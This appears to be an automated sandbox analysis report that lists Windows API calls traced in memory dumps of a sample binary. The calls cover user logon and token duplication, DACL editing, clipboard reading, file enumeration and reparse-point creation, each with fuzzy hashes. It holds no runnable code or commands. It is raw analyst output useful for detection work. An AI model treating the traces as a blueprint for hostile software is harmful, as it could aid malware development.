                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00F3319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00F35031
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F03963
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F03A76
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,00F40A84,?,?,00000000,?,00F40A84,00000000,0000000C), ref: 00F40737
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindFirstFileW.KERNEL32(?,?), ref: 00F6DCCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DD1B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F6DD2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindClose.KERNEL32(00000000), ref: 00F6DD43
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7666E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f6a918adbea3e19d9c5118564c0347d2db676ae29ce578617ea0c1e2dd1bc87b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9bd44d0ea74c65b0965b62bbb110bbff317456b97005fa3f4c2e5e6e6604816b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a918adbea3e19d9c5118564c0347d2db676ae29ce578617ea0c1e2dd1bc87b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF082357006049FC710EF58D845B6EB7E5AF88360F048449F9498B392CB74BC01EB91
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: GetLastError.KERNEL32 ref: 00F62097
                                                                                                                                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F61BD2
                                                                                                                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F61BF4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F61C05
                                                                                                                                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F61C1D
                                                                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00F61C36
                                                                                                                                                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00F61C40
                                                                                                                                                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F61C5C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F61B48), ref: 00F61A20
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A0B: CloseHandle.KERNEL32(?,?,00F61B48), ref: 00F61A35
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                        • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                        • Opcode ID: 91d6aa190f3c17df98b3329e5f19c4534d08746203719e8359284a480dd2c69e
                                                                                                                                                                                                                                                                                        • Instruction ID: 06f8782a75ec42348ca0c9aaca7d66088bf82447921143de9cb01b64154a8848
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91d6aa190f3c17df98b3329e5f19c4534d08746203719e8359284a480dd2c69e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B81AB71D00209AFDF109FA4DC49FEE7BB8FF08314F18812AF914A61A1D7758955EB60
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F61518
                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F6154C
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F61563
                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F6159D
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F615B9
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F615D0
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F615D8
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F615DF
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F61600
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F61607
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F61636
                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F61658
                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F6166A
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F61691
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F61698
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F616A1
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616A8
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F616B1
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616B8
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F616C4
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: GetProcessHeap.KERNEL32(00000008,00F614FD,?,00000000,?,00F614FD,?), ref: 00F61AED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F614FD,?), ref: 00F61AF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F614FD,?), ref: 00F61B03
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ab8e00cf45d4026775e92bc45b46e1a2acd912f93ddf07742c7c3bccf1e34643
                                                                                                                                                                                                                                                                                        • Instruction ID: c74c961fc5967ec0e1b6a1d088e929f9d9dd0c59d53c19e45cf37478a09996c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8e00cf45d4026775e92bc45b46e1a2acd912f93ddf07742c7c3bccf1e34643
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A715BB6D00209ABDF10DFA5DC48FEEBBB8BF04350F184516E915E71A1D7359A05DBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00F9DCD0), ref: 00F7F586
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F7F594
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00F7F5A0
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F5AC
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F5E4
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F5EE
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F619
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00F7F626
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00F7F62E
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F63F
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F67F
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F7F695
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 00F7F6A1
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F6B2
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F7F6D4
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7F6F1
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7F72F
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F750
                                                                                                                                                                                                                                                                                        • CountClipboardFormats.USER32 ref: 00F7F771
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F7B6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 298d7fa343f1b10ed262205ebfc247e956fce654ac1d8fbcc94e91817bfa927a
                                                                                                                                                                                                                                                                                        • Instruction ID: 30af10e00c50c5d3b013d4d817ad9e357febb040a05d85425db9e18215dd83e2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 298d7fa343f1b10ed262205ebfc247e956fce654ac1d8fbcc94e91817bfa927a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9561C3352043059FD304EF24DC84F6ABBA4AF84714F24856EF44A872A2DB31ED49FB62
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F77403
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F77457
                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F77493
                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F774BA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F774F7
                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F77524
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                        • Opcode ID: f7b1269caaa422aae869d966ba39c2dca3c4d97f4ce0ce5295dfc11cbbee9c4f
                                                                                                                                                                                                                                                                                        • Instruction ID: c6df5093eebbd7d279e69007b5de507a035bc6ae91ef2610310f4813dc8070ca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7b1269caaa422aae869d966ba39c2dca3c4d97f4ce0ce5295dfc11cbbee9c4f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D17272508344AFC310EB64CC41EAFB7ECAF88704F44491EF589D6191EB78DA49EB62
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F7A0A8
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F7A0E6
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00F7A100
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F7A118
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A123
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7A13F
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7A18F
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00FC7B94), ref: 00F7A1AD
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7A1B7
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A1C4
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A1D4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 4c6f1266588a7771c79055376a7aec81335643f5cd76f6d39a16a289209ee43d
                                                                                                                                                                                                                                                                                        • Instruction ID: d80560956b3d17ca700a1b56b732a61bce6b4e90613249df06c9051d0a9d2340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c6f1266588a7771c79055376a7aec81335643f5cd76f6d39a16a289209ee43d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731EA3290021D6BEB10AFB4DC4AEDE73AC9F84320F654157E819D3090E774DE44AE66
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F74785
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F747B2
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F747E2
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F74803
                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00F74813
                                                                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F7489A
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F748A5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F748B0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                        • Opcode ID: 12e655aaa612de852fbc869d670219cae69e05d08cb1ae104ff5f0ac880ff0d9
                                                                                                                                                                                                                                                                                        • Instruction ID: 489bb090805e9500c1850fe1831b3ce9b1f7b4261c0d3ac819f9bb467e34862a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e655aaa612de852fbc869d670219cae69e05d08cb1ae104ff5f0ac880ff0d9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5731A37290025DABDB209BA0DC49FEB37BDEF89710F6081B6F509D2060E7749645EB25
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F7A203
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F7A25E
